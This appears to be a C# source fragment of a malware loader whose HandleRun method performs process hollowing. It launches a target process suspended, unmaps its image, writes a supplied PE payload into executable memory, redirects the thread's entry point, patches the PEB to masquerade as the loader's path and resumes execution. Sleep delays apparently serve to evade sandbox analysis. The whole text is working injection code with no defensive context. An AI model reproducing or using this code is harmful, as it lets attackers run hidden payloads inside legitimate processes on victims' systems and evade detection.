private static extern bool CreateProcess(string applicationName, string commandLine, IntPtr processAttributes, IntPtr threadAttributes, bool inheritHandles, uint creationFlags, IntPtr environment, string currentDirectory, ref Loader.STARTUP_INFORMATION startupInfo, ref Loader.PROCESS_INFORMATION processInformation);
private static bool HandleRun(string path, string cmd, byte[] data, bool compatible) { int num = 0; string text = string.Format("\"{0}\"", path); Loader.STARTUP_INFORMATION targetProcessStartInfo = default(Loader.STARTUP_INFORMATION); Loader.PROCESS_INFORMATION targetProcessInfo = default(Loader.PROCESS_INFORMATION); targetProcessStartInfo.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(Loader.STARTUP_INFORMATION))); bool result; try { if (!string.IsNullOrEmpty(cmd)) { text = text + " " + cmd; } if (!Loader.CreateProcess(path, text, IntPtr.Zero, IntPtr.Zero, false, 4u, IntPtr.Zero, null, ref targetProcessStartInfo, ref targetProcessInfo)) { throw new Exception(); } int num2 = BitConverter.ToInt32(data, 60); int num3 = BitConverter.ToInt32(data, num2 + 52); int[] array = new int[179]; array[0] = 65538; if (IntPtr.Size == 4) { // 32bit windows if (!Loader.GetThreadContext(targetProcessInfo.ThreadHandle, array)) { throw new Exception(); } } else { // windows 64 bit if (!Loader.Wow64GetThreadContext(targetProcessInfo.ThreadHandle, array)) { throw new Exception(); } } int num4 = array[41]; int num5 = 0; if (!Loader.ReadProcessMemory(targetProcessInfo.ProcessHandle, num4 + 8, ref num5, 4, ref num)) { throw new Exception(); } if (num3 == num5) { if (Loader.NtUnmapViewOfSection(targetProcessInfo.ProcessHandle, num5) != 0) { throw new Exception(); } } Loader.Sleep(5000); int length = BitConverter.ToInt32(data, num2 + 80); int bufferSize = BitConverter.ToInt32(data, num2 + 84); bool flag = false; int num6 = Loader.VirtualAllocEx(targetProcessInfo.ProcessHandle, num3, length, 12288, 64); if (!compatible && num6 == 0) { flag = true; num6 = Loader.VirtualAllocEx(targetProcessInfo.ProcessHandle, 0, length, 12288, 64); } if (num6 == 0) { throw new Exception(); } Loader.Sleep(5000); if (!Loader.WriteProcessMemory(targetProcessInfo.ProcessHandle, num6, data, bufferSize, ref num)) { throw new Exception(); } int num7 = num2 + 248; short num8 = BitConverter.ToInt16(data, num2 + 6); for (int i = 0; i <= (int)(num8 - 1); i++) { int num9 = BitConverter.ToInt32(data, num7 + 12); int num10 = BitConverter.ToInt32(data, num7 + 16); int srcOffset = BitConverter.ToInt32(data, num7 + 20); if (num10 != 0) { byte[] array2 = new byte[num10]; Buffer.BlockCopy(data, srcOffset, array2, 0, array2.Length); if (!Loader.WriteProcessMemory(targetProcessInfo.ProcessHandle, num6 + num9, array2, array2.Length, ref num)) { throw new Exception(); } } num7 += 40; } Loader.Sleep(10000); byte[] bytes = BitConverter.GetBytes(num6); if (!Loader.WriteProcessMemory(targetProcessInfo.ProcessHandle, num4 + 8, bytes, 4, ref num)) { throw new Exception(); } int num11 = BitConverter.ToInt32(data, num2 + 40); if (flag) { num6 = num3; } array[44] = num6 + num11; if (IntPtr.Size == 4) { if (!Loader.SetThreadContext(targetProcessInfo.ThreadHandle, array)) { throw new Exception(); } } else { if (!Loader.Wow64SetThreadContext(targetProcessInfo.ThreadHandle, array)) { throw new Exception(); } } Loader.Sleep(5000); Loader.ReadProcessMemory(targetProcessInfo.ProcessHandle, 0x0, ref num5, 4, ref num); if (IntPtr.Size == 4) { // 32bit windows if (!Loader.GetThreadContext(targetProcessInfo.ThreadHandle, array)) { throw new Exception(); } } else { // windows 64 bit if (!Loader.Wow64GetThreadContext(targetProcessInfo.ThreadHandle, array)) { throw new Exception(); } } Loader.Sleep(5000); // Patch the PEB PEB_Patch.Apply(targetProcessInfo.ThreadHandle, Assembly.GetEntryAssembly().Location); Loader.Sleep(5000); if (Loader.ResumeThread(targetProcessInfo.ThreadHandle) == -1) { throw new Exception(); } } catch (Exception ex) { Console.WriteLine(ex.ToString()); Process processById = Process.GetProcessById(Convert.ToInt32(targetProcessInfo.ProcessId)); if (processById != null) { processById.Kill(); } result = false; return(result); } result = true; return(result); }